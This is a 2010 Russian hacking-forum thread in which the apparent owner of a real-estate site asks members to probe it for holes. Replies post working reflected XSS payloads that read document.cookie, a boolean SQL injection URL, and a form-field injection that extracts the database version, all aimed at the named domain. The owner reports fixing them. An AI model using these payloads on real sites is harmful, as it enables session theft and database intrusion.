Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Проверка на разные уязвимости |
16.04.2010, 20:38
|
|
Новичок
Регистрация: 14.04.2010
Сообщений: 5
Провел на форуме:
4625
Репутация:
1
|
|
Проверка на разные уязвимости
Всем госу взлома и тестов привет!
Ребята, пожалуйста проверте сайт http://norieltor.ru на разного рода уязвимости.
|
|
|
19.04.2010, 03:20
|
|
Новичок
Регистрация: 14.04.2010
Сообщений: 5
Провел на форуме:
4625
Репутация:
1
|
|
что... совсем нет ошибок?
|
|
|
|
19.04.2010, 03:44
|
|
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228
Репутация:
403
|
|
уязвимо : ваше имя
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';">alert('XSS')','177','a4c0338947c01a38489d4e0e7 d45ad06','2010-04-19 03' at line 1
http://norieltor.ru/search/offer=1&p=3&city=7700000000000&o=2&r=1&ml=1&pl='>" ><script>alert(document.cookie)</script>
Что смог нашел.
Последний раз редактировалось Ruslan1817; 19.04.2010 в 03:51..
|
|
|
|
19.04.2010, 16:48
|
|
Новичок
Регистрация: 14.04.2010
Сообщений: 5
Провел на форуме:
4625
Репутация:
1
|
|
спасибо поправим
|
|
|
|
20.04.2010, 20:44
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
незнаю уязвимость или нет но по крайней мере ругается:
http://norieltor.ru/search/offer=1&p=3&o=2&r=4,3&c1=0&c2=0&s=1&v=1&page=1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' and `komnati` IN (4,3) and UNIX_TIMESTAMP(datetime_post) > 1266424935 ORDER' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '',3) and UNIX_TIMESTAMP(datetime_post) > 1266424951 ORDER BY `datetime_post` DES' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and UNIX_TIMESTAMP(datetime_post) > 1266424972 ORDER BY `datetime_post` DESC' at line 1
ругается вот этот вот кусочек:
&o=2&r=4,3
|
|
|
|
20.04.2010, 22:15
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Там sql-inj, а вы из слона делаете муху со своими xss и "ругается".
http://norieltor.ru/search/offer=1&p=3&o=2&r=-55)+OR+1=1+--+-3&c1=0&c2=0&s=1&v=1&page=1
|
|
|
|
20.04.2010, 23:34
|
|
Новичок
Регистрация: 14.04.2010
Сообщений: 5
Провел на форуме:
4625
Репутация:
1
|
|
BlackSun и pinch спасибо, поправил уже.
|
|
|
|
22.04.2010, 00:07
|
|
Познающий
Регистрация: 13.04.2010
Сообщений: 42
Провел на форуме:
460968
Репутация:
81
|
|
Код:
http://norieltor.ru/search/offer=1&p=3&c1=&c2=9999999999%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Пассивка
Код:
http://norieltor.ru/search/offer=1&p=3&c1=9999999999%22%3E%3Cscript%3Ealert(%22HOLE%22)%3C/script%3E&c2=
Еще одна
Код:
http://norieltor.ru/search/offer=1&p=3%22%3E%3Cscript%3Ealert(%22HOLE%22)%3C/script%3E&c1=9999999999&c2=
Там же
Инъекция!!!
http://norieltor.ru/edit/ -редактируем своё сообщение
в цену вставляем: 200', `cena`=(SELECT VERSION()),`plita`='1. В цене получим покоцаную версию.
Инъекция есть во всех остальных полях!!!
Продолжим:
4)http://norieltor.ru/search/offer=1&f=2%22%3Cscript%3Ealert(document.cookie)%3 C/script%3E
5)http://norieltor.ru/search/offer=1&v=2"<script>alert(document.cookie)</script>
6)http://norieltor.ru/search/offer=1&s=2%22%3Cscript%3Ealert(document.cookie)%3 C/script%3E
Последний раз редактировалось BlackSun; 22.04.2010 в 02:12..
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
